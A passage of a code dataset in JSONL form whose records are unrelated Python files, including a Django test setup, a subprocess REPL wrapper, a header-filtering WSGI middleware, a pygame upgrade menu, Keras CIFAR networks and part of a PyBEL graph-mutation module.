@contextmanager\n def netrc(self, netrc_contents):\n m = mock_open(read_data=netrc_contents)\n with patch('__builtin__.open', m):\n netrc = Netrc()\n yield netrc\n","sub_path":"tests/python/pants_test/util/test_netrc.py","file_name":"test_netrc.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"541311919","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\n\nfrom django.contrib.auth.models import User\n\nimport data.models as models\n\nclass TestCase:\n '''Holds all data from the api_test_cases.csv file.'''\n def __init__(self, row):\n self.test_case = row[0]\n self.test_id = row[1]\n self.url = row[2]\n self.method = row[3]\n self.request = json.loads(row[4]) if row[4] else {}\n self.username = row[5]\n self.status_code = row[6]\n self.full_response = json.loads(row[7]) if row[7] else {} \n self.json_expression = row[8]\n self.parsed_response = json.loads(row[9]) if row[9] else {} \n\nclass TestCases:\n '''Read in all the test cases in the api_test_cases.csv file and parse them into\n a dictionary keyed by test case name.'''\n def __init__(self):\n self.test_case_path = f\"{os.environ['CUSTOM_FF_PATH']}/common/api_test_cases.csv\"\n with open(self.test_case_path) as test_case_file:\n self.test_case_data = test_case_file.read().splitlines()\n if not self.test_case_data:\n raise ValueError(\"The test case data csv file is empty.\")\n self.test_case_data = self.test_case_data[1:]\n self.test_cases = {}\n def get(self):\n for row in self.test_case_data:\n row = row.split('\\t')\n this_test_case = TestCase(row)\n case_name = this_test_case.test_case\n if case_name not in self.test_cases:\n self.test_cases[case_name] = []\n self.test_cases[case_name].append(this_test_case)\n return self.test_cases \n\nclass TestData:\n '''A single point to create 
and reference data needed during testing.'''\n def __init__(self):\n self.user = [row for row in User.objects.all()]\n self.league = [] \n self.leaguestat = []\n self.lineup = []\n self.member = []\n self.statcondition = []\n # map for string -> class name lookups\n self.models = {'League': models.League, 'LeagueStat': models.LeagueStat, \n 'Lineup': models.Lineup, 'Member': models.Member, \n 'StatCondition': models.StatCondition} \n def create(self, model_name, **kwargs):\n model = self.models[model_name]\n data = model.objects.create(**kwargs)\n getattr(self, model_name.lower()).append(data)","sub_path":"postgres_backend/data/tests/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"58158380","text":"# Copyright (c) Stanford University, The Regents of the University of\n# California, and others.\n#\n# All Rights Reserved.\n#\n# See Copyright-SimVascular.txt for additional details.\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject\n# to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS\n# IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED\n# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A\n# PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER\n# OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import, unicode_literals, print_function, division\n\nimport subprocess\nimport os\nimport sys\nimport re\nimport signal\nfrom subprocess import Popen\nfrom codecs import getencoder, getincrementaldecoder\n\nPY3 = sys.version_info[0] == 3\n\nPOSIX = False\n\nclass SubprocessRepl(object):\n def __init__(self, cmd):\n self.encoder = getencoder('utf8')\n self.decoder = getincrementaldecoder('utf8')()\n self.popen = Popen(cmd, bufsize=1,\n stderr=subprocess.STDOUT, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n if POSIX:\n flags = fcntl.fcntl(self.popen.stdout, fcntl.F_GETFL)\n fcntl.fcntl(self.popen.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK)\n\n def is_alive(self):\n return self.popen.poll() is None\n\n def read_bytes(self):\n out = self.popen.stdout\n if POSIX:\n while True:\n i, _, _ = select.select([out], [], [])\n if i:\n return out.read(4096)\n else:\n # this is windows specific problem, that you cannot tell if there\n # are more bytes ready, so we read only 1 at a times\n\n while True:\n byte = self.popen.stdout.read(1)\n # debugging code\n #file1 = open(\"C:\\\\tmp\\\\stdout.tcl.txt\",\"ab\")\n #file1.write(byte)\n #file1.close()\n if byte == b'\\r':\n # f'in HACK, for \\r\\n -> \\n translation on windows\n # I tried universal_endlines but it was pain and misery! 
:'(\n continue\n return byte\n\n def write(self, command):\n (bytes, how_many) = self.encoder(command)\n si = self.popen.stdin\n si.write(bytes)\n si.flush()\n #debugging code\n #file2 = open(\"C:\\\\tmp\\\\stdin.tcl.txt\",\"ab\")\n #file2.write(bytes)\n #file2.close()\n\n def reset_decoder(self):\n self.decoder = getincrementaldecoder('utf8')()\n\n def read(self):\n \"\"\"Reads at least one decoded char of output\"\"\"\n while True:\n bs = self.read_bytes()\n if not bs:\n return None\n try:\n output = self.decoder.decode(bs)\n except Exception as e:\n output = \"■\"\n self.reset_decoder()\n if output:\n return output\n \n","sub_path":"BuildWithMake/Release/Jupyter/linux/site-packages/simvascular_python_kernel/subprocess_repl.py","file_name":"subprocess_repl.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"124293348","text":"# encoding: utf-8\nimport jieba\nimport os\nimport pandas as pd\n\nDATA_DIR = 'D:/workspace/data/wallstreetcn'\nWORD_DIR = u'D:/Data/词库'\nCAIJING_WORD_FILE = u'%s/THUOCL_caijing.txt'%(WORD_DIR)\n\njieba.load_userdict(CAIJING_WORD_FILE)\n\ndef uncertainty(word_set):\n words1 = [u'政策', u'支出', u'预算', u'政治', u'利率', u'改革']\n flag1 = False\n for w in words1:\n if w in word_set:\n flag1 = True\n break\n if not flag1:\n return False\n words2 = [u'政府', u'背景', u'权威', u'官方']\n flag2 = False\n for w in words2:\n if w in word_set:\n flag2 = True\n break\n if not flag2:\n return False\n words3 = [u'央行', u'税收', u'监管', u'规定', u'中央银行', u'中国人民银行', u'赤字', u'TWO']\n for w in words3:\n if w in word_set:\n return True\n return False\n\ndef main(years):\n dic_tot, dic_pol = {}, {}\n for year in years:\n print(year)\n files = ['%s/%d/%s'%(DATA_DIR, year, f) for f in os.listdir('%s/%d'%(DATA_DIR, year))]\n for f in files:\n with open(f, 'r') as fp:\n text = fp.readlines()\n time = text[0].decode('utf-8').split('_')[0]\n time = time.strip()\n if time.find('-') == -1:\n time = time.replace(u'年', '-').replace(u'月', '-').replace(u'日', '')\n date = time.split(' ')[0]\n if not dic_tot.has_key(date):\n dic_tot[date] = 0\n if not dic_pol.has_key(date):\n dic_pol[date] = 0\n content = \" \".join(text[1:])\n content = jieba.cut(content)\n doc = set([word for word in content])\n dic_tot[date] += 1\n if uncertainty(doc):\n dic_pol[date] += 1\n df = pd.DataFrame({'tot': pd.Series(dic_tot), 'pol': pd.Series(dic_pol)})\n df = df.sort_index()\n df.to_excel('D:/Data/risk/policy_uncertainty.xlsx')\n\nif __name__ == '__main__':\n years = range(2010, 2019)\n main(years)\n ","sub_path":"Research/news-tracking/src/policy_uncertainty.py","file_name":"policy_uncertainty.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"281086286","text":"\"\"\"Program to get current location from device corresponding to given API name\"\"\"\nimport asyncio\nfrom argparse import ArgumentParser\n\nfrom ..location import get_location_api_class, implemented_location_apis\n\n\nasync def print_location(device):\n print(await device.get_fix())\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('location_device', choices=implemented_location_apis, help='Location device to use')\n args = parser.parse_args()\n\n location_api_class = get_location_api_class(args.location_device)\n location_api = location_api_class()\n\n print(f\"Using {args.location_device} API\")\n\n loop = asyncio.get_event_loop()\n\n with 
location_api.get_device() as device:\n loop.run_until_complete(print_location(device))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"swarm/onboard/tools/get_location.py","file_name":"get_location.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"471536933","text":"# Copyright 2014 Donald Stufft\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport hmac\n\n\nclass XForwardedTokenMiddleware:\n\n header = \"HTTP_X_WAREHOUSE_ACCESS_TOKEN\"\n\n def __init__(self, app, token):\n self.app = app\n self.token = token\n\n def __call__(self, environ, start_response):\n # Filter out X-Forwarded-* headers from the request if the secret token\n # does not exist or does not match.\n if not hmac.compare_digest(environ.pop(self.header, \"\"), self.token):\n for key in set(environ.keys()):\n if key.startswith(\"HTTP_X_FORWARDED_\"):\n del environ[key]\n\n return self.app(environ, start_response)\n","sub_path":"warehouse/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"185595710","text":"import pygame\r\n\r\nclass Upgrade:\r\n\r\n\tdef __init__(self, Upgrade):\r\n\t\tself.settings = Upgrade.settings\r\n\t\tself.screen = Upgrade.screen\r\n\t\tself.screen_rect = self.screen.get_rect()\r\n\t\tself.stats = Upgrade.stats\r\n\t\tself.token = Upgrade.token\r\n\r\n\t\t#upgrade physical attack\r\n\t\tself.attack = pygame.image.load(\"img/upgrader/damage_upgrade.png\")\r\n\t\tself.attack_rect = self.attack.get_rect()\r\n\t\tself.attack = pygame.transform.scale(self.attack, (3*self.attack_rect.width//2, 3*self.attack_rect.height//2))\r\n\r\n\t\t#upgrade physical and magic defense\r\n\t\tself.defense = pygame.image.load(\"img/upgrader/defense_upgrade.png\")\r\n\t\tself.defense_rect = self.defense.get_rect()\r\n\t\tself.defense = pygame.transform.scale(self.defense, (3*self.defense_rect.width//2, 3*self.defense_rect.height//2))\r\n\r\n\t\t#upgrade health points' capacity\r\n\t\tself.capacity = pygame.image.load(\"img/upgrader/hp_upgrade.png\")\r\n\t\tself.capacity_rect = self.capacity.get_rect()\r\n\t\tself.capacity = pygame.transform.scale(self.capacity, (3*self.capacity_rect.width//2, 3*self.capacity_rect.height//2))\r\n\r\n\t\t#background for upgrade\r\n\t\tself.bg_criteria = pygame.image.load(\"img/upgrader/latar_upgrade_tegak.png\")\r\n\t\tself.bg_criteria_rect = self.bg_criteria.get_rect()\r\n\r\n\t\t#button for upgrade\r\n\t\tself.button = pygame.image.load(\"img/upgrader/button.png\")\r\n\t\tself.button_rect = self.button.get_rect()\r\n\r\n\tdef draw_background(self):\r\n\t\t#drawing background for physical attack upgrade\r\n\t\tself.bg_attack = self.bg_criteria\r\n\t\tself.bg_attack_rect = self.bg_attack.get_rect()\r\n\t\tself.bg_attack_rect.midleft = self.screen_rect.midleft\r\n\t\tself.bg_attack_rect.x += 90\r\n\t\tself.bg_attack_rect.y += 
40\r\n\r\n\t\t#drawing background for defense upgrade\r\n\t\tself.bg_defense = self.bg_criteria\r\n\t\tself.bg_defense_rect = self.bg_defense.get_rect()\r\n\t\tself.bg_defense_rect.center = self.screen_rect.center\r\n\t\tself.bg_defense_rect.y += 40\r\n\r\n\t\t#drawing background for capacity upgrade\r\n\t\tself.bg_capacity = self.bg_criteria\r\n\t\tself.bg_capacity_rect = self.bg_capacity.get_rect()\r\n\t\tself.bg_capacity_rect.midright = self.screen_rect.midright\r\n\t\tself.bg_capacity_rect.y += 40\r\n\t\tself.bg_capacity_rect.x -= 90\r\n\r\n\t\t#drawing to the screen\r\n\t\tself.screen.blit(self.bg_attack, self.bg_attack_rect)\r\n\t\tself.screen.blit(self.bg_defense, self.bg_defense_rect)\r\n\t\tself.screen.blit(self.bg_capacity, self.bg_capacity_rect)\r\n\r\n\tdef draw_icon(self):\r\n\t\t#draw icon for physical upgrade\r\n\t\tself.attack_rect.center = self.bg_attack_rect.center\r\n\t\tself.attack_rect.y -= 100\r\n\t\tself.attack_rect.x -= 5\r\n\r\n\t\t#draw icon for defense upgrade\r\n\t\tself.defense_rect.center = self.bg_defense_rect.center\r\n\t\tself.defense_rect.y -= 100\r\n\t\tself.defense_rect.x -= 3\r\n\r\n\t\t#draw icon for capacity upgrade\r\n\t\tself.capacity_rect.center = self.bg_capacity_rect.center\r\n\t\tself.capacity_rect.y -= 100\r\n\t\tself.capacity_rect.x -= 5\r\n\r\n\t\t#draw all icon\r\n\t\tself.screen.blit(self.attack, self.attack_rect)\r\n\t\tself.screen.blit(self.defense, self.defense_rect)\r\n\t\tself.screen.blit(self.capacity, self.capacity_rect)\r\n\r\n\tdef draw_button(self):\r\n\t\t#draw button for physical upgrade\r\n\t\tself.attack_button = self.button\r\n\t\tself.attack_button_rect = self.attack_button.get_rect()\r\n\t\tself.attack_button_rect.midbottom = self.bg_attack_rect.midbottom\r\n\t\tself.attack_button_rect.y -= 30\r\n\t\tself.attack_button_rect.x += 3\r\n\r\n\t\t#draw button for defense upgrade\r\n\t\tself.defense_button = self.button\r\n\t\tself.defense_button_rect = self.defense_button.get_rect()\r\n\t\tself.defense_button_rect.midbottom = self.bg_defense_rect.midbottom\r\n\t\tself.defense_button_rect.y -= 30\r\n\t\tself.defense_button_rect.x += 3\r\n\r\n\t\t#draw button for capacity upgrade\r\n\t\tself.capacity_button = self.button\r\n\t\tself.capacity_button_rect = self.capacity_button.get_rect()\r\n\t\tself.capacity_button_rect.midbottom = self.bg_capacity_rect.midbottom\r\n\t\tself.capacity_button_rect.y -= 30\r\n\t\tself.capacity_button_rect.x += 3\r\n\r\n\t\t#draw button to exit\r\n\t\tself.exit = pygame.image.load(\"img/upgrader/silang.png\")\r\n\t\tself.exit_rect = self.exit.get_rect()\r\n\t\tself.exit_rect.topright = self.screen_rect.topright\r\n\r\n\t\t#draw buttons\r\n\t\tself.screen.blit(self.attack_button, self.attack_button_rect)\r\n\t\tself.screen.blit(self.defense_button, self.defense_button_rect)\r\n\t\tself.screen.blit(self.capacity_button, self.capacity_button_rect)\r\n\t\tself.screen.blit(self.exit, self.exit_rect)\r\n\r\n\t\t#draw button text for each button\r\n\t\tself.button_font = pygame.font.SysFont(\"centuryschoolbook\", 20)\r\n\t\tself.text = self.button_font.render(\"Upgrade\", 1, (255, 255, 255))\r\n\t\tself.rect_attack = (163, 414)\r\n\t\tself.rect_defense = (443, 414)\r\n\t\tself.rect_capacity = (722, 414)\r\n\r\n\t\t#draw text\r\n\t\tself.screen.blit(self.text, self.rect_attack)\r\n\t\tself.screen.blit(self.text, self.rect_defense)\r\n\t\tself.screen.blit(self.text, self.rect_capacity)\r\n\r\n\tdef show_price(self):\r\n\t\tself.token_font = pygame.font.SysFont(\"centuryschoolbook\", 30)\r\n\t\tself.price_attack 
= self.stats.price_attack\r\n\t\tself.price_defense = self.stats.price_defense\r\n\t\tself.price_hp = self.stats.price_hp\r\n\r\n\t\tself.price_attack_token = str(self.stats.price_attack)\r\n\t\ttoken_color = 255, 255, 255\r\n\t\tself.text_attack = self.token_font.render(self.price_attack_token , True, token_color)\r\n\t\tself.text_rect_attack = self.text_attack.get_rect()\r\n\t\tself.text_rect_attack.center = self.bg_attack_rect.center\r\n\t\tself.text_rect_attack.x += 15\r\n\t\tself.text_rect_attack.y += 10\r\n\r\n\t\tself.price_defence_token = str(self.stats.price_defense)\r\n\t\tself.text_defense = self.token_font.render(self.price_defence_token , True, token_color)\r\n\t\tself.text_rect_defense = self.text_defense.get_rect()\r\n\t\tself.text_rect_defense.center = self.bg_defense_rect.center\r\n\t\tself.text_rect_defense.x += 20\r\n\t\tself.text_rect_defense.y += 10\r\n\r\n\t\tself.price_hp_token = str(self.stats.price_hp)\r\n\t\tself.text_hp = self.token_font.render(self.price_hp_token , True, token_color)\r\n\t\tself.text_rect_hp = self.text_hp.get_rect()\r\n\t\tself.text_rect_hp.center = self.bg_capacity_rect.center\r\n\t\tself.text_rect_hp.x += 17\r\n\t\tself.text_rect_hp.y += 10\r\n\r\n\t\tself.token1 = self.token.token\r\n\t\tself.token1_rect = self.token1.get_rect()\r\n\t\tself.screen.blit(self.token1, self.token1_rect)\r\n\t\tself.token2 = self.token.token\r\n\t\tself.token2_rect = self.token2.get_rect()\r\n\t\tself.screen.blit(self.token2, self.token2_rect)\r\n\t\tself.token3 = self.token.token\r\n\t\tself.token3_rect = self.token3.get_rect()\r\n\t\tself.screen.blit(self.token3, self.token3_rect)\r\n\r\n\t\tself.token1_rect.center = self.bg_attack_rect.center\r\n\t\tself.token1_rect.x -= 25\r\n\t\tself.token1_rect.y += 10\r\n\t\tself.token2_rect.center = self.bg_defense_rect.center\r\n\t\tself.token2_rect.x -= 20\r\n\t\tself.token2_rect.y += 10\r\n\t\tself.token3_rect.center = self.bg_capacity_rect.center\r\n\t\tself.token3_rect.x -= 23\r\n\t\tself.token3_rect.y += 10\r\n\r\n\t\tself.screen.blit(self.token1, self.token1_rect)\r\n\t\tself.screen.blit(self.token2, self.token2_rect)\r\n\t\tself.screen.blit(self.token3, self.token3_rect)\r\n\r\n\t\tself.screen.blit(self.text_attack, self.text_rect_attack)\r\n\t\tself.screen.blit(self.text_hp, self.text_rect_hp)\r\n\t\tself.screen.blit(self.text_defense, self.text_rect_defense)\r\n\r\n\tdef show_statement(self):\r\n\t\tself.text_font = pygame.font.SysFont(\"centuryschoolbook\", 20)\r\n\t\tself.color_text = 255, 255, 255\r\n\t\tself.attack_text = self.text_font.render(\"Attack : +2\", True, self.color_text)\r\n\t\tself.attack_text_rect = self.attack_text.get_rect()\r\n\t\tself.attack_text_rect.center = self.bg_attack_rect.center\r\n\t\tself.attack_text_rect.y -= 30\r\n\r\n\t\tself.defense_text = self.text_font.render(\"Defense : +1\", True, self.color_text)\r\n\t\tself.defense_text_rect = self.defense_text.get_rect()\r\n\t\tself.defense_text_rect.center = self.bg_defense_rect.center\r\n\t\tself.defense_text_rect.y -= 30\r\n\r\n\t\tself.hp_text = self.text_font.render(\"Max hp : +10\", True, self.color_text)\r\n\t\tself.hp_text_rect = self.hp_text.get_rect()\r\n\t\tself.hp_text_rect.center = self.bg_capacity_rect.center\r\n\t\tself.hp_text_rect.y -= 30\r\n\r\n\t\tself.screen.blit(self.attack_text, self.attack_text_rect)\r\n\t\tself.screen.blit(self.defense_text, self.defense_text_rect)\r\n\t\tself.screen.blit(self.hp_text, 
self.hp_text_rect)","sub_path":"aset/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":8043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
+{"seq_id":"23380766","text":"#==============================================================================\n# Pre-defined nets for Keras\n# Each returns a Keras model and an optimizer function\n# Sourya Dey, USC\n#==============================================================================\n\n#==============================================================================\n#==============================================================================\n# # Imports\n#==============================================================================\n#==============================================================================\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D,MaxPooling2D,Flatten,Dense,Dropout,Activation\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.regularizers import l2\n#==============================================================================\n\n\n#==============================================================================\n#==============================================================================\n# # General CL functions\n#==============================================================================\n#==============================================================================\ndef any_cl_only(config, activation='relu', output_activation='softmax', kernel_initializer='he_normal', bias_initializer='zeros', kernel_regularizer=l2(0.)):\n '''\n Any MLP network\n lr and decay are set to defaults for Adam as in Keras\n '''\n model = Sequential()\n model = add_cls(model, config, activation=activation, output_activation=output_activation, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, kernel_regularizer=kernel_regularizer)\n return model\n\n\ndef add_cls(model, config, activation='relu', output_activation='softmax', kernel_initializer='he_normal', bias_initializer='zeros', kernel_regularizer=l2(0.)):\n '''\n Helper function to add CLs to any EXISTING model\n Inputs:\n model: Existing model\n config: Must know what the exact shape of CL portion is\n Eg: If adding CLs to a CIFAR net with CNNs, then we must know what the number of neurons after flattening is\n Eg: cifar_gitblog1_example gives 4096 neurons after flattening, so maybe config = np.array([4096,512,10])\n kernel_initializer, bias_initializer, kernel_regularizer: Use the same for all layers\n Use activation for all hidden layers, output_activation for output layer\n Output:\n Model with CLs attached\n Possible improvement:\n Add dropout as an ndarray input with size = len(config)-1\n '''\n for i in range(1,len(config)):\n if i==len(config)-1: #Use output_activation for output layer and name it 'output'\n model.add(Dense(config[i], input_shape=(config[i-1],), activation=output_activation, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, kernel_regularizer=kernel_regularizer, name='output'))\n else: #Standard hidden layers\n model.add(Dense(config[i], input_shape=(config[i-1],), activation=activation, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, kernel_regularizer=kernel_regularizer))\n return model\n#==============================================================================\n\n\n\ndef cifar_deep(config=np.array([4096,512,10]), activation='relu', 
output_activation='softmax', kernel_initializer='he_normal',\n bias_initializer='zeros', kernel_regularizer=l2(0.), dropout=0.5):\n '''\n dropout: Fraction of units to DROP, i.e. set to 0. for no dropout\n '''\n model = Sequential()\n model.add(Conv2D(60, (3, 3), padding='same', input_shape=(32,32,3))) #note that conv layers have no regularizer, but they do have dropout\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(Conv2D(60, (3, 3), padding='same'))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(dropout))\n\n model.add(Conv2D(125, (3, 3), padding='same'))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(Conv2D(125, (3, 3), padding='same'))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(dropout))\n\n model.add(Conv2D(250, (3, 3), padding='same'))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(Conv2D(250, (3, 3), padding='same'))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(dropout))\n\n model.add(Flatten(name='flatten_before_mlp'))\n model = add_cls(model, config, activation=activation, output_activation=output_activation, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, kernel_regularizer=kernel_regularizer)\n# NOTE: Original code uses dropout(0.5) in between any 2 CLs\n#==============================================================================\n# opt = SGD(lr=lr,decay=decay,momentum=0.9)\n# opt = Adam(lr=lr, decay=decay)\n#==============================================================================\n return model\n\n\ndef cifar_shallow(config=np.array([4000,500,100]), activation='relu', output_activation='softmax', kernel_initializer='he_normal',\n bias_initializer='zeros', kernel_regularizer=l2(0.), dropout=0.25):\n '''\n Intentionally make it harder for MLP by reducing the amount of feature extraction via CNN\n '''\n model = Sequential()\n model.add(Conv2D(250, (5, 5), padding='same', input_shape=(32,32,3)))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(MaxPooling2D(pool_size=(8, 8)))\n model.add(Dropout(dropout))\n\n model.add(Flatten(name='flatten_before_mlp'))\n model = add_cls(model, config, activation=activation, output_activation=output_activation, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, kernel_regularizer=kernel_regularizer)\n return model\n","sub_path":"keras_nets.py","file_name":"keras_nets.py","file_ext":"py","file_size_in_byte":6230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"493099533","text":"\"\"\"\n\nThis module contains functions that help mutate a network\n\n\"\"\"\n\nimport logging\nfrom collections import defaultdict\n\nfrom pybel.canonicalize import calculate_canonical_name\nfrom pybel.constants import *\nfrom .constants import INFERRED_INVERSE, CNAME\n\nlog = logging.getLogger(__name__)\n\n\ndef left_merge(g, h):\n \"\"\"Adds nodes and edges from H to G, in-place for G\n\n :param g: A BEL Graph\n :type g: pybel.BELGraph\n :param h: A BEL Graph\n :type h: pybel.BELGraph\n \"\"\"\n\n for node, data in h.nodes_iter(data=True):\n if node not in g:\n g.add_node(node, data)\n\n for u, v, k, d in 
h.edges_iter(keys=True, data=True):\n\n if k < 0: # unqualified edge that's not in G yet\n if v not in g.edge[u] or k not in g.edge[u][v]:\n g.add_edge(u, v, key=k, attr_dict=d)\n elif v not in g.edge[u]:\n g.add_edge(u, v, attr_dict=d)\n elif any(0 <= gk and d == gd for gk, gd in g.edge[u][v].items()):\n continue\n else:\n g.add_edge(u, v, attr_dict=d)\n\n\ndef collapse_nodes(graph, dict_of_sets_of_nodes):\n \"\"\"Collapses all nodes in values to the key nodes in place\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n :param dict_of_sets_of_nodes: A dictionary of {node: set of nodes}\n :type dict_of_sets_of_nodes: dict\n \"\"\"\n\n for key_node, value_nodes in dict_of_sets_of_nodes.items():\n for value_node in value_nodes:\n for successor in graph.successors_iter(value_node):\n for key, data in graph.edge[value_node][successor].items():\n if key >= 0:\n graph.add_edge(key_node, successor, attr_dict=data)\n elif successor not in graph.edge[key_node] or key not in graph.edge[key_node][successor]:\n graph.add_edge(key_node, successor, key=key, **{RELATION: unqualified_edges[-1 - key]})\n\n for predecessor in graph.predecessors_iter(value_node):\n for key, data in graph.edge[predecessor][value_node].items():\n if key >= 0:\n graph.add_edge(predecessor, key_node, attr_dict=data)\n elif predecessor not in graph.pred[key_node] or key not in graph.edge[predecessor][key_node]:\n graph.add_edge(predecessor, key_node, key=key, **{RELATION: unqualified_edges[-1 - key]})\n\n graph.remove_node(value_node)\n\n # Remove self edges\n for u, v, k in graph.edges(keys=True):\n if u == v:\n graph.remove_edge(u, v, k)\n\n\n# TODO improve edge traversal efficiency from 2|E| to |E| with something like a disjoint union agglomeration\ndef build_central_dogma_collapse_dict(graph):\n \"\"\"Builds a dictionary to direct the collapsing on the central dogma\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n :return: A dictionary of {node: set of nodes}\n :rtype: dict\n \"\"\"\n collapse_dict = defaultdict(set)\n\n r2p = {}\n\n for rna_node, protein_node, d in graph.edges_iter(data=True):\n if d[RELATION] != TRANSLATED_TO:\n continue\n\n collapse_dict[protein_node].add(rna_node)\n r2p[rna_node] = protein_node\n\n for gene_node, rna_node, d in graph.edges_iter(data=True):\n if d[RELATION] != TRANSCRIBED_TO:\n continue\n\n if rna_node in r2p:\n collapse_dict[r2p[rna_node]].add(gene_node)\n else:\n collapse_dict[rna_node].add(gene_node)\n\n return collapse_dict\n\n\ndef build_central_dogma_collapse_gene_dict(graph):\n \"\"\"Builds a dictionary to direct the collapsing on the central dogma\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n :return: A dictionary of {node: set of nodes}\n :rtype: dict\n \"\"\"\n collapse_dict = defaultdict(set)\n\n r2g = {}\n for gene_node, rna_node, d in graph.edges_iter(data=True):\n if d[RELATION] != TRANSCRIBED_TO:\n continue\n\n collapse_dict[gene_node].add(rna_node)\n r2g[rna_node] = gene_node\n\n for rna_node, protein_node, d in graph.edges_iter(data=True):\n if d[RELATION] != TRANSLATED_TO:\n continue\n\n if rna_node not in r2g:\n raise ValueError('Should complete origin before running this function')\n\n collapse_dict[r2g[rna_node]].add(protein_node)\n\n return collapse_dict\n\n\ndef collapse_by_central_dogma(graph):\n \"\"\"Collapses all nodes from the central dogma (GENE, RNA, PROTEIN) to PROTEIN, or most downstream possible entity, in place\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n collapse_dict = 
build_central_dogma_collapse_dict(graph)\n log.info('Collapsing %d groups', len(collapse_dict))\n collapse_nodes(graph, collapse_dict)\n\n\ndef collapse_by_central_dogma_to_genes(graph):\n \"\"\"Collapses all nodes from the central dogma (GENE, RNA, PROTEIN) to GENE in place\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n collapse_dict = build_central_dogma_collapse_gene_dict(graph)\n log.info('Collapsing %d groups', len(collapse_dict))\n collapse_nodes(graph, collapse_dict)\n\n\ndef collapse_variants_to_genes(graph):\n \"\"\"Finds all protein variants that are pointing to a gene and not a protein and fixes them\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n for node, data in graph.nodes(data=True):\n if data[FUNCTION] != PROTEIN:\n continue\n if VARIANTS not in data:\n continue\n if any(d[RELATION] == TRANSCRIBED_TO for u, v, d in graph.in_edges_iter(node, data=True)):\n graph.node[node][FUNCTION] = GENE\n\n\ndef _infer_converter_helper(node, data, new_function):\n new_tup = list(node)\n new_tup[0] = new_function\n new_tup = tuple(new_tup)\n new_dict = data.copy()\n new_dict[FUNCTION] = new_function\n return new_tup, new_dict\n\n\ndef infer_central_dogmatic_translations(graph):\n \"\"\"For all 